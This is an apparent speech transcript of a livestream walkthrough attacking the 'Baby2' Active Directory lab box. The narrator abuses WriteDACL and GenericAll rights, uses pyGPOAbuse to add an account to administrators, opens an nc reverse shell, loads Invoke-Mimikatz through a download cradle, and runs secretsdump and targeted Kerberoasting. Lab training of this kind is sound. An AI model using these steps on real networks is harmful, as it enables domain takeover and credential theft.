a net view, right? Yeah. For my IP address, right? So let's go ahead and grab my IP address again. Let's see if we can try to do something with that. /share, doesn't really matter, I don't think. Okay, no, we already got hers, didn't we? Okay, so let's go ahead and try getting a PowerShell. So we already actually got hers. That was who we got earlier, wasn't it? Whenever we did that login VBS script, obviously. So let's see back into C drive. And it looks like we have shares. Did we already have this? Did we see this before? Okay, apps, docs, and homes. Okay, yep. Okay, so that's everything that we've seen before. We have our user.txt like right there, so that's good. Okay, cool. So now he's got to try to figure out, well, we already have our Bloodhound also. Let's go ahead and see if Amelia can do anything. Amelia Griffin, right? Let's go ahead and see if she can do something. Okay, what do you have? Ooh, she has an effective inbound GPO. That's kind of weird. Okay. Could change that. Okay. Siblings. Reachable high value targets 10. Well, that's good for us, huh? Okay, nope. It's just can't RDP into there, which could DC sync. That's not going to give us much. Don't care about that. Admin count. She is an admin, supposedly. So who am I slash all? Is the administrator's group disabled? Or anything like that? Do we just have to do like a UAC bypass? No, the only one that's group use for deny only is the Windows, that one like right there. But she supposedly is in the admin's group. I'm trying to see where we're at. Probably that guy like right there. Baby2 office. Okay, maybe it's part of this office like right here. We also have legacy. So we have office and legacy are two groups that she's in, right? So let's go ahead and keep scrolling down here. Let's see what we can actually do here. First degree RDP, we know that. Outbound. Okay, let's see what we got here. She's a member of Legacy who can write DACL on GPO admin. Really now? Okay, so it's that Legacy group that can write DACL on GPO admin. Let's go ahead and check out this write DACL. Okay, so we can do it this way with Windows, but you know what? I just made the DACL edit work, so let's go ahead and try it um, from Callie here. Let's go ahead and give this a quick try. We don't know her password, do we? And we don't know her hash also. We only know her NetCLM hash. So this, we're not actually going to be able to do this one because we don't know her password. Now I think about it. And we can't crack her password also. Okay. So maybe that may not work for us. There's not someone else on here, is there? No, okay. So we don't know her password like that. Let's go ahead and we could try to find her password maybe. Let's go ahead and look at her history or PowerShell history, see if she has any. Right. So we go to history, PowerShell history. We can try something like this. Let's go ahead and see where her PS readline option's at. Okay. Let's see if there's anything in there now. We'll type that out. Okay, say it does exist. Even though it literally just said that it does exist. But we'll say that's saving it there. Let's go ahead and just try to find any console history.txt that she can. What's up, Chubbs? You didn't do this part, did you? Okay, so looks like we're going to be doing Windows abuse on here, right? So looks like we're most likely going to need Power View on here also, right? We'll go ahead and we'll let this run like real quick, and then we'll do a we'll put Power View into memory here, and we'll see what we can do with that, right? Because I technically shouldn't have to do any of this up here. I should just have to do this like right here, right? So to abuse that, you may need to authenticate to make towards a member of that. We already did. If you're not ready to process a member to do this, okay, so we're already ready to process, so we're good with that. So we should just have to do something like this, like right here, right? But we have that right over GPO admin, so we should be able to do something like, we're gonna have to say, so it should be something like credential equals PowerShell history is named differently. What do you mean? That's the PowerShell history, like right there. That's why we did the PS readline first. This guy's taking forever though too. I should not have done that, like right there. Actually, I don't think we needed the I don't think we need it like that yet. Now, do we? I think we actually want to do this another way. Cyrano, I've not seen you in a while, dude. Where you been at? I've not seen you in forever. I haven't seen you on Discord, nothing, dude. Take a little break. Okay, this is taking forever, so we're just going to go ahead and RL wrap it again. And just wait for SC64 to download again, just do it again. Because that is taking forever up there. Alright, there we go. Where'd my music go? Guess we'll listen to Linkin Park. He may have. Okay, let's go ahead and PowerShell it again. And this time we'll go into IEX, IWR, use basic parsing. I've already forgot my IP address. Slash powerview.ps1. And I should actually have more than one way to do this on my Bloodhound. Let's see here. We had DACL write over users from Linux, DACL write from PowerView. Oh, look at that. I already have it. I'll say, I know I've done pretty much, I've tried to do every single thing, all the abuses within PowerView or within Bloodhound before. I've done many of them in every way possible that I can. Do I not have PowerView anymore? Did you even try to download it? No, okay, say I don't have PowerView. Okay, so for some reason I don't have PowerView on this machine, even though I brought all my tools over. Let's go ahead and grab PowerView like real quick. PowerView, raw. There we go. So we'll grab that, and we'll wget it over here. We'll go ahead and start up our web server again. We'll go ahead and we'll call for that same thing again. There we go. So now we can put PowerView into memory, right? Call it a day. From here, we can go ahead and do what we've done before, right? So I already have a bunch of ways to be able to do all this stuff, okay? So it looks like we're going to add domain object ACL rights, all target identity GPO admin, principal identity Amelia Griffins, okay? So we want to put in that principal identity like right there, say that Amelia Griffins now pretty much owns GPO admin. That's what we're saying like right there. PowerView is a tool that you don't really need it, but it makes doing things like what we just did, like right there, the add object ACL, way easier than trying just to use the PowerShell like built-in stuff. But yeah, it makes things a lot easier for you. You can like do curb roasting through it, things like that. Just you can do a bunch of stuff through PowerView. I believe that who is it? Hackthebox Academy actually has a whole. No, it's not reverse shell. That would be invoke PowerShell TCP. Hackthebox Academy actually has a whole module just on PowerView, and it's like one of like they're like it's like 500 bits or whatever the hell they call it, or like 1,000 or something. It's like one of like the tier 3 or 4 or tier 2. No, yeah, tier 3 or 4 or something. That's one of the higher tiers. Also, you can do a bunch of stuff with PowerView. All right. So now that we have this, right, we have our add domain object rights, boom, Amelia Griffins. Okay. Now we should be able to technically change the password, right? Yes, we can. So that's exactly what we're doing like right here. Okay. So we're going to type in cred, $ equals, password 123 exclamation point, as plain text force. And then because we own this user now, right, we now own GPO admin. So we have all the rights over them, right? Yes. Bombshell, yes. Just makes everything much easier. And yeah. And then we can now select the domain password for that domain user password for GPO admin. Account password be cred, which is password 123 exclamation point, right? So now what we should then be able to do is type in NXC, boom, and we should be able to type in GPO admin, and then password 123 exclamation point, and we should be able to see that they can log in, right? That's what you should technically be able to see now. Okay, cool, and we can, okay? So we now have GPO admin. So if we have GPO admin now, GPO admin has generic all, right? So let's go ahead and take a look at this guy, because we now have rights to him, right? And we should be able to, that generic all over default domain policy. Okay, that's a big one, like right there. See if there's anything easier in here. He also has a bunch of reachable high value targets. Yep, go over default domain policy for Baby VL2. Okay, so since we have generic all over the default domain policy, we should now be able to do a PyGPO abuse, right? So what we should be able to do now is we actually need this guy, like right here, I believe it is. We should need this guy and GPO path. Yep, we need that like right there. So now we have this GPO path. Okay. What we should be able to do is actually do a GPO abuse, which I don't believe I have anymore on here. GPO abuse. Nope. So we got to download that. So let's go ahead and download that guy right there. And now I can put it in there. GPO abuse. GitHub. Sharp GPO abuse. Is that one it? PyGPO abuse. There we go. Let's say I want the Python one. All right, so we got our PyGPO abuse like right here. Let's go ahead and we'll actually cd in a /home, Cali local bin. Okay, we'll actually wget that guy like right there. So I can call for him wherever, change mode plus X for him. Okay, and we'll cd back into desktop, boom, boom. Okay, now from here, I should actually have a PyGPO abuse. I'll probably have that over in here somewhere. Let's see if I do. If I don't, then I'm definitely going to put it in here. Yep, look at that. I actually have the exact one, okay, that we actually have to do. But generic all over policy, look at that, right? So we have a generic all over a default domain policy, okay? So what we can do from here now, okay, is we can go ahead and let me actually make sure that my box is going to die over here. Let me extend that. All right, so now we have that PyGPO abuse. Let me go and grab my notes from before. Like I said, I have already done this. It is already on Medium and everything like that too. So we can call for Python 3 PyGPO abuse.py, right? Our domain, the guy that we already know, right? We changed his password like right there. GPO ID. Now the GPO ID is what you get from over here. Okay, so GPO ID is going to be that 3-1. Let's see here, right here. That's your GPO ID, like right there. Okay, or right here, either one. Okay, it's both the same exact number. Okay, I do, Trebs. That's what I sent you earlier. Well, I sent you. That was my medium that I sent. That said, oh, I have done it, and I sent you, or I sent the link across for this box. Okay, so we have this guy right here. So we go ahead and delete that, just in case if it's changed. And well, yeah, because I just want to. Oh, I don't know why I said the Python 3. There we go. I'm like, yeah, I know. Okay, there we go. Looks like I might have to actually go into that machine and actually call for it like that, huh? Okay. So I wonder if I actually need, because it's saying it can't find it. I wonder if I actually need to do a git clone for this guy right here. Yeah, 'cause I should have something like that, like right there. I wonder if I need all this like right here for that to actually work. And if I do, that's okay. I can just download it all. And I can put it all into there, right? Who's that? DZ. Oh, I have no idea. Um, so I wonder if I actually need all these guys in there too, which I feel like I do. So we're just gonna actually grab this. We'll copy that. We'll go ahead and we'll CD into there. We're gonna remove that RF, that pi GPO abuse. Then we'll CD into tools. And we'll just do a good clone for that guy right there. And we'll CD in that pi GPO boost and we'll do a Python 3. Yep, we'll do that like right there. We'll try like that. Which that's not giving me nearly as many errors. So I could probably actually just, I actually want to see something real quick. If I move pi GPO abuse, that pi, or if I move that, let's go ahead and copy it first. Let's try copy it. So home, Cali, dot local bin. Can I do that? Obviously tech R, not tech 3, tech R. There we go. Okay. And then if I do a Python or a copy pi GPO abuse.py, so it saves that place. DZ, is this going to work? So like right there. I CD into there. And I change mode plus X for that guy. I CD back to here. And then I do a Python, or I do a pi GPO abuse. Will that actually work? No, it will not. Okay, so no. All right, let's go ahead. Okay. CD back into tools. That's not still there, right? Nope. Okay, cool. No, they just type it in. I don't know why it's not. There we go. Okay. I'll probably get it Python 3. Did you get those notes from Hack the Box Academy? No, Treps. This is from me doing it before and struggling for, hours upon end. Okay, so now we created that scheduled task, right? Awesome. So once we create that scheduled task, go ahead and look at my notes again. Okay. The tech app forces it, and then we put, okay. So from here, it looks like we are going to send a command up, right? Net local group administrator / add GPO admin. It says that tech app forces it, and then we also put it in the make sure the DCIP, okay? So it looks like we're actually going to send a command to put GPO admin in the net local group of administrators, and since it says that forces it, I'm going to go with that actually runs, what is that? To update the policy, right? So let's go ahead and try that guy right there. Right? This group GPO ID is the same. Yep. Okay. The DCIP is obviously not the same. So let's go ahead and do a quick IP config. Bloodhound notes? I don't know. I may have. Some of them came from, no. Some of them came from, you talking about all these guys in here? Like all this stuff? No, because some of them came, like this one's invoked out local, so I made that one like right there. Invoked out local. A lot of these came from water execution. If you watch that video, Trev's water execution, a lot of them came from there. So learning things from that guy like right there. Like target curve rows came from there. So yeah, a lot of these I already had before I did Hack the Box Academy. Okay, so now we have that, right? So supposedly this guy should now be an admin, right? Now I could try like a net group, or yeah, net local group, I guess, administrators, and see if he actually hops in there or not, which he has not yet. Now this may take a minute for him to actually get in there. Okay, so right now he still is the domain user, right? But we did set it up. Let's try to set it up again. Because it's just scheduling the task, right? Happy New Year, Fix-It42. How you doing? So who knows how long? I wonder if we can actually do a God, what is that command? Yes, GP update. Thank you. GP update / force. Can always try something like that and see if he goes in there. I'm trying to think of that command, Travis, the whole time. Supposedly attack F is supposed to do that, according to my notes. But let's go ahead and see if that worked now. Okay, so yes, now he's now part of the administrators group, and we know his password, right? So technically, what we should actually be able to do is like next to the SMB, we should be able to do attack X, who am I? And we should definitely be able to get in, right? I mean, that should be it for us. And he can, and we have a shell, which means that he can read admin $ on SMB, and we are now in. That's it for us, okay? So we can now we should actually be able to remina in here also now. But we'll just do let's see here. Let's try actually remina. Let's see if we can actually get it like this. And then we'll do a little bit of above and beyond. Or you know what we can actually do now? Is we can also try something like secret dump maybe for Baby2 / GPOA and ADM. Just going to do it like this. At the IP address. Try something like that, right? Did I do the slash the wrong way? Looks like it. Okay, so we can try that like right there. We can try to remina into it now, right? Go a little bit above and beyond here and try to do some more stuff than just, just getting in the machine, right? Just getting that root flag there. More than 8-bit Oni, how you doing? So this is obviously working now. Profits, it is not very serious. Nothing I do is very serious. I'm pretty trash. All right, so we got that guy now, right? So we should now be able to, we're doing that secrets dump like right now, but we should also be able to do something like invoke mimikatz. We can actually call for that netcat file again and just get a netcat shell back. So we can go ahead and stop that. RL wrap, NC tech LVMP 445. We can go ahead and just do something like this. NXC SMB, boom, whoop, not that. NXC SMB 1078.184. TAC U, GPO ADM, TAC P, password 123 exclamation point. TAC X, we could say C, Windows, temp. They called the other one NC64.exe, TAC E, command. And then we can go ahead and do that for our IP address, which I obviously already forgot. So let me go and grab that again. Our IP address, 445, right? Boom. We'll go ahead and we'll exit out of here. Start this back up again. Hit enter on that guy. And we can actually call for it back up here again. From there, we could, we could obviously also remina into it, right? We could already P into it, but we should actually be who am I, and I should be GPO admin now, so I could try like an IEX PowerShell, IEX, IWR, use basic parsing, HTTP. God. One day I will remember my IP address. One day I will. / invoke mimikatz. .ps1, right? Do something like that, okay? And we can try to do invoke mimikatz, right? So we can do an invoke mimikatz attack command. I'll say dump. I'll say slash patch. Vol creds slash all. CKUR. Oh no, slash patch. Excuse me. CKUR. I'll say log on passwords slash full. Right. That seems good enough. I think it's slash patch for vol cred. Happy New Year, Great Fox. How you doing? So this is just kind of going like a little bit like above and beyond. I messed one up. I always mess that one up. Ursula, log on. Oh, well, I spelled passwords wrong also. So we do actually get Amelia Griffin's password now. So what I want to try now is, because if we got that password before, let's say, right? So we actually have her password like right here now. I want to try that the other way that we did it, right? What did I mess up? Volcred. Is it slash all? Is it not slash patch? Or is it Volcreds? Might be Volcreds, not Volcred. Okay. So what I want to do is I actually want to try her password. Okay, and I want to, where is it at? Way up here. There was a plus sign in it. There we go. There's Amelia Griffin's like right there. Still messing up that Volcreds. Can't do the logon passwords, that's fine. Or is it Cred Vault? I always forget that one. Might be Cred Vault. Let's see here. I mean, I have it written in here somewhere. Open file. Should be current notes. Notes.ctv. Whoops. Oh god, it's just okay. I'm about to say it just freeze. If it did, we would have just been done. That's all. Let me go ahead and look for mimikatz. There we go. Volcred slash batch. Yeah. Okay, I had it right. Did I put the double colons in there? That's why. There we go. Volcred slash patch. There we go. Okay. So that's your password right there, right? What I want to try is I want to now try to do that GPO abuse, how we did before, right? So Volcred slash patch didn't show us anything. Okay. We can always try that log on passwords. I don't think I put the double in there either for log on passwords, so we'll try that again. But yeah, I want that password. Okay, we're just not getting it. Let's try it without slash full. Hey, that's how I roll. There are 2 applications, dude. It's in 2. It's fine. All right, so let's go ahead and try this now. Let's go ahead and but I know where they all are, DZ. That's how my brain works. I know like wherever they all are, and that's all that really matters. Okay. So now what I want to do is go back to Amelia, right? I want to look at her. She's got all the reachables, right? She's super reachable. And that's because of the DC sync that she has. Or not DC sync, but because of the what does she have again? It was in one of her groups, right? There we go. Group delegate control. Oh, she also has right owner over GPO management. Okay. GPO, okay. So she has right DACL. Oh, she also has right owner over this too. We could just did that. Nope, owner edit. Okay, so I'm going to try this owner edit. Let's try this. Like real quick. Boom. Okay, action right. All right. Owner is going to be the attacker, who is Amelia, right? So it's actually going to be Amelia, like right here. So we'll take Amelia, like right here. I just want her. Yep, that's all I want. the victim, who is GPO admin, right? Domain, baby2.vl. The user, who's me again. This is back to me again. Okay. Amelia. And then her password, right? And her password is this atrocity down here. Great password, though. Okay. Let's go ahead and try that. Okay. So I don't think it's owner anymore. I think it's, let me see here. New owner. Is it new owner? Yeah, I think it's new owner. Let's go ahead and try this. This is going way above and beyond. Okay, so we now own again GPO ADM, so we own that person, even though we already did technically, but we have now shown that we can do it on there. So we now own them again there. Now from here, after we own them, this is for right owner, help, Linux abuse, we got the DACL edit, right? So let's go ahead and try that, like right there. Okay. And we have principal, our controlled user, right? Who is Amelia. The target, who is GPO admin. And then the same exact stuff at the very end over here. Okay, so now we modified. Okay, so we now did our DACL edit, right? And now we should be able to do a force change password for that person because we now own them and we've now edited, we now did a DACL edit, right? So we should technically be able to now change GPO admin's password again. Whoops. Messed up. Not the first time I've ever done that. Target user, GPO ADM. And we'll say PSN SSW0RD exclamation point. All right. Now we just need pretty much this. We just got to change out one thing for, instead of that, like right there, we're actually going to do a percent sign. Percent. And then domain controller, right? Which I should have already had to do that up here. Oh, because I was doing Baby2, so I actually did not need to make sure up there. There we go. Thank you. Let's see if that works. So we're not getting an error. If we don't get an error, usually that means that we did it. So let's go ahead and try it again. And now this is just showing you that, hey, if we had her password, we could have just stuck out here and done it like this, right? There's another way to do it. So there you go. So that does work like right there. So we've now proven that we can do it multiple ways, right? And we also had that targeted Kerberos too, that we could have ran also, and see if we could have cracked GPO admin's password in the first place, which I'm pretty sure we'll be able to. But we can go ahead and do baby2.vl. We will be able to now. But so you guys see how target Kerberos works, right? Our controlled user, okay? Now all we need for this is just our controlled user. That's it. And then their password, right? We're going very, we're not trying to, absolutely. Facility, I'm done with OSCP. I did that. He said he watched me before OSCP. Used to watch me before OSCP. Damn, dude. Sorry you don't watch me anymore. No, I was kidding. That's not her password. All right, let's go ahead and grab this thing right here. We'll do a target Kerberos, right? We should be able to crack we'll be able to crack the password now. But, this is another way we could have did it. And we can see, okay, cool. We actually can do GPO admin like right there, right? I think it's, I don't know if I have time traps. I don't know what things I have. I don't even know how to even look them up. All right, let's go ahead and we'll echo this into hash.text. And we'll go ahead and we'll do a hashcat. Remember, the newest one does try to figure it out for you. and it looks like it did get it with the Kerberos 5, 13100. I thought it froze it again. I think it's uptime. You know what it is, Trebs? I think it's uptime. Something something I'll do. When did I take it? During the summertime, I took it. I think it was like August or something like that. I don't know. I mean, Trebs, you can just ask me. I can actually look. Oh, uptime. Yeah, uptime. Um, so close to 2 hours. So as you can see, we could do that, but obviously I'm pretty sure we weren't going to be able to do that the other way with target curb roast. But these are just multiple ways that we can do stuff, right? We can also try the shadow credential attack. This one starts to get a little bit more difficult, right? I believe I have it somewhere in here how to do it. Target Kerberos, force change password, generic all. I know I have that exact attack like right there because I've shown it before multiple times. Generic all over policy, nope. Over policy. Generic right. Boom, boom, boom. Okay, I don't really remember where exactly those notes are at, like right there. But I know I do have the pie whisker notes. Um, but I think that's going to be it for this one, like right here. I feel like we've done a lot, right? Oh, we can do the PKI and IT with this, with pie whisker. After that, we can do PKI and IT, which then allows us to be able to pass a ticket pretty much. But I think I'm going to be done with this one, like right here. I think that was good enough for everything, like right there. I feel like we hit it up pretty good. So I will talk to you all later on YouTube over here. Somebody go ahead and shut the video part off.